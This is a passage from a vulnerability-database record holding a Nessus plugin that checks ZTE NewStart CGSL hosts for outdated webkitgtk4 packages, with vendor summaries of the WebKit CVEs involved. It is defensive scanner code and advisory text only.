(CVE-2021-30761)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. (CVE-2021-30762)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0166\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-11070\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-6237\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-6251\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-7285\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-7292\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8503\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8506\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8515\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8518\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8523\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8524\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8535\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8536\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8544\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8551\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8558\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8559\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8563\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8571\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8583\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8584\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8586\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8587\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8594\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8595\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8596\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8597\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8601\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8607\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8608\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8609\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8610\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8611\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8615\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8619\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8622\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8623\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8625\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8644\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8649\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8658\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8666\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8669\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8671\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8672\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8673\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8674\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8676\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8677\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8678\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8679\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8680\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8681\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8683\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8684\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8686\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8687\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8688\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8689\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8690\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8707\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8710\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8719\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8720\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8726\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8733\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8735\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8743\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8763\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8764\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8765\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8766\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8768\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8769\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8771\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8782\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8783\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8808\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8811\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8812\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8813\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8814\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8815\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8816\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8819\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8820\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8821\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8822\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8823\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8835\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8844\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2019-8846\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-10018\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-11793\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3862\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3864\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3865\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3867\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3868\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3885\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3894\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3895\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3897\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3899\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3900\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3901\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-3902\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2021-30666\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2021-30761\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2021-30762\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL webkitgtk4 packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3899\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-10018\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:webkitgtk4-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:webkitgtk4-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:webkitgtk4-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:webkitgtk4-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_core:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:5\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.05\" &&\n release !~ \"CGSL MAIN 5.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.05 / NewStart CGSL MAIN 5.05');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL CORE 5.05': [\n 'webkitgtk4-2.28.2-2.el7',\n 'webkitgtk4-devel-2.28.2-2.el7',\n 'webkitgtk4-doc-2.28.2-2.el7',\n 'webkitgtk4-jsc-2.28.2-2.el7',\n 'webkitgtk4-jsc-devel-2.28.2-2.el7'\n ],\n 'CGSL MAIN 5.05': [\n 'webkitgtk4-2.28.2-2.el7',\n 'webkitgtk4-devel-2.28.2-2.el7',\n 'webkitgtk4-doc-2.28.2-2.el7',\n 'webkitgtk4-jsc-2.28.2-2.el7',\n 'webkitgtk4-jsc-devel-2.28.2-2.el7'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkitgtk4');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:46", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has webkitgtk4 packages installed that are affected by multiple vulnerabilities:\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8835)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-7285)\n\n - A validation issue was addressed with improved logic. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2019-7292)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. A malicious website may be able to execute scripts in the context of another website. (CVE-2019-8503)\n\n - A cross-origin issue existed with the fetch API. This was addressed with improved input validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11.\n Processing maliciously crafted web content may disclose sensitive user information. (CVE-2019-8515)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8846)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8844)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web content that allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash). (CVE-2020-11793)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8688, CVE-2019-8689)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.\n (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17, iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS 13.3.1. A DOM object context may not have had a unique security origin. (CVE-2020-3864)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8766)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1, iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2019-8771)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 